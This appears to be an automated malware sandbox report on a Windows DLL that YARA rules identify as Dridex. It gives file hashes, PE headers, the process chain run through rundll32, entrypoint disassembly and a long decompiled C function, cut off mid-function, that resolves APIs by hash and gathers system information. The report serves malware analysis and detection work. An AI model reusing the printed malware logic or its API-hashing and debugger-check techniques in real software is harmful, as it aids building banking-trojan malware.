Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.2.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D6B.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4698
Entropy (8bit):	4.4877009648952555
Encrypted:	false
SSDEEP:	48:cvIwSD8zsFJgtWI9CcWSC8BJCs8fm8M4JCdsDChFeo+q8/QQBR24SrSWd:uITffNVSNnCRJlxoVJDWWd
MD5:	F8135692885414B84D256F717A796903
SHA1:	95F9A7AFBD5B1B7ADDD488656B6A0AFF3F0F33E7
SHA-256:	B6EBCF9CA1362EFA06D5FAC03FA9C05D99D53B057CEDCBF88725B75141687E7E
SHA-512:	AA781381BBBD4224F37EE4887E50F6826327AD4F8BEBCF5E004815BE115A7F884ED27C1A18EAAB696582E95B99C7A20068D8F3C0F1ED4EFD44B809A46CA3C6EE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309785" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.276053824421805
Encrypted:	false
SSDEEP:	12288:BxqtC8mFD7M/S+UdeiL/NA9DDY1tm1juUKzDTkAOCNr36uc5hPkPkZ:vqtC8mFD7M/S+UkO
MD5:	5939F26615D7BB8628B14A9A7084D056
SHA1:	E3C638401E93AFF4E14191BCBD69A1FD9B0F625B
SHA-256:	94FA5148970DEFA008003BEE5925F7B4DD9916FDB2C6AB3712F7EDE7246408BD
SHA-512:	B20C466041932758986CA552FE1BAAE62CC223C545C882D9CCD91C75ED8281E0F85D0CCE2F3F0422474CD2AC50E4E75C3C95733029D967E1F4665B3011293BF0
Malicious:	false
Reputation:	low
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmJ.Ru..................................................................................................................................................................................................................................................................................................................................................V(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.032359811129686
Encrypted:	false
SSDEEP:	384:Bq5oQ5Rftx1vPJ4XMsFcnE7kgPBqX/Seq5QMVyi6+/Xl4Lk4uZd1DoXzn2Xvwvm:MomRftx1HJ4XJFcE7hBqXKeq5QMVyi6t
MD5:	8AD05CBB05EA2F708F36F397C03509F1
SHA1:	99319A049B54A63262E51B329E392C69DCC0388F
SHA-256:	A5938E9E435CD75D12A55DCDD66FFB6B1D020622762DCEDF0E95A56BEC957E3A
SHA-512:	CFC76D0840B0F66D95957FF1E99949E01D00DEB2EC2BFF967A76F479802030715DA8918355C7FA1823DCA3B18E3AC07D4D6B0A6FB22F7599CFDF0059E9BA5AC4
Malicious:	false
Reputation:	low
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmJ.Ru..................................................................................................................................................................................................................................................................................................................................................V(HvLE.^......Y...........i.r.}....!iM+.`..........0................... ..hbin................p.\..,..........nk,...Tu.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...Tu........ ........................... .......Z.......................Root........lf......Root....nk ...Tu.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.322437972026823
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll
File size:	544768
MD5:	43d4b9318439f6926dfbcf46a5291621
SHA1:	06581c15c15cf8345bef1cea5b32fbc7d7d71e03
SHA256:	b06b7b05e576d19367c383aabd9c8fed8cd5e7955e2f1493d326b9b5306c7439
SHA512:	1cd1903a05030e394056ec5c23f4d08d8959ef349ffeaccbc61feb620724e4555c7e5fae7b40bedcae308681af79b9cb60f4b5d181d4e24d5ec2f547349cbe04
SSDEEP:	6144:+D+RYf/Mv1UvT4vjYf/Glpov3KvfMvLo+jwHk3UryzU3+R7ff4evm35IQku4+pMl:+Dt2UAogoOwhx7nA4+pMAg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004db0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C2E245 [Wed Dec 22 08:31:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e980d287af7ef0ccd616c6efb9daaae8

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F7104C68C41h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000090h
mov eax, dword ptr [ebp+08h]
mov byte ptr [esp+00000083h], 00000064h
mov dword ptr [esp+70h], 02263442h
mov dword ptr [esp+44h], eax
call 00007F7104C6C7CAh
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
movzx edi, word ptr [esp+0000008Ah]
mov bx, di
mov dword ptr [esp+40h], eax
mov eax, edi
xor eax, 0000E2E7h
mov word ptr [esp+3Eh], ax
mov al, byte ptr [esp+77h]
mov byte ptr [esp+3Dh], al
mov eax, dword ptr [esp+00000084h]
mov dword ptr [esp+38h], esi
mov si, word ptr [esp+3Eh]
mov word ptr [eax+eax+00000000h], si

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7c029	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c08c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x6b2e	0x7000	False	0.391496930804	data	4.47906652106	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x747db	0x75000	False	0.316222622863	data	7.44059897898	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x6190	0x5000	False	0.24609375	data	5.03782298504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x2f0	0x1000	False	0.09033203125	data	0.789164600932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x1138	0x2000	False	0.2421875	data	4.12390144992	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x84060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
ADVAPI32.dll	RegCloseKey, QueryServiceStatusEx, AccessCheck
WS2_32.dll	WSACleanup
USER32.dll	GetWindowTextA
KERNEL32.dll	CloseHandle, GetModuleHandleW, GetFileSize, OutputDebugStringA, IsDebuggerPresent, GetModuleFileNameW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6752 Parent PID: 4664

General

Start time:	20:35:00
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll"
Imagebase:	0x2b0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4756 Parent PID: 6752

General

Start time:	20:35:00
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6324 Parent PID: 4756

General

Start time:	20:35:01
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1
Imagebase:	0x890000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.334490741.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000000.301040628.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000000.303124420.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6712 Parent PID: 6324

General

Start time:	20:35:04
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6324 -s 696
Imagebase:	0xe80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6752 Parent PID: 4664 loaddll32.exeCOMMON

Executed Functions

Function 6ED00730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6ED00730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6ed0d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6ED0361C(0x30);
					 *0x6ed0d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6ED03698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6ED0306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6ed0d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6ED00FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6ed0d1f8 + 0xb)) = _t162;
					_t363 = E6ED0306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6ed0d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6ED00730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6ed0bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6ECFF584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6ECFF828(_t429 + 0x24, E6ECFF4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6ECFF4BC(_t429 + 0x24, E6ECFF4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6ED05580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6ECFF654(_t429 + 0x20);
							E6ED055B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6ED05864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6ECFDFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6ED055B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6ED05864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6ECFDFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6ED055B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6ED05864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6ECFDFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6ECFCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6ED05558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6ECFCFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6ED05558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6ECFCFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6ED05558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6ECFCFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6ED05558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6ECFCFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6ED05558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6ECFCFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6ED05558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6ed0d1f8 + 0x24)) = _t189;
							_t190 = E6ED01030(0xffffffffffffffff);
							_t320 =  *0x6ed0d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6ed0d1f8 + 0x2c)) = E6ED010A4(0x6ed0d1f8, 0xffffffffffffffff);
								L78:
								if(E6ED0306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6ed0d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6ED0306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6ed0d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6ED035F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6ED0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6ED035F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6ECFF584(_t429 + 0x18c, _t206);
								_t411 = E6ED0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6ECFF654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6ECFF4BC(_t429 + 0x18c, 0);
								_t213 = E6ECFF4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6ED035F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6ECFF4BC(_t429 + 0x18c, 0);
								E6ECFDF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6ED0306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6ECFDFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6ED0306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6ECFE06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6ED04FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6ECFE8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6ECFDFA4(_t429 + 0x1b8);
								E6ECFDFA4(_t429 + 0x1b0);
								E6ECFF654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6ECFBB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6ed0d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6ECFBB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6ED035F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
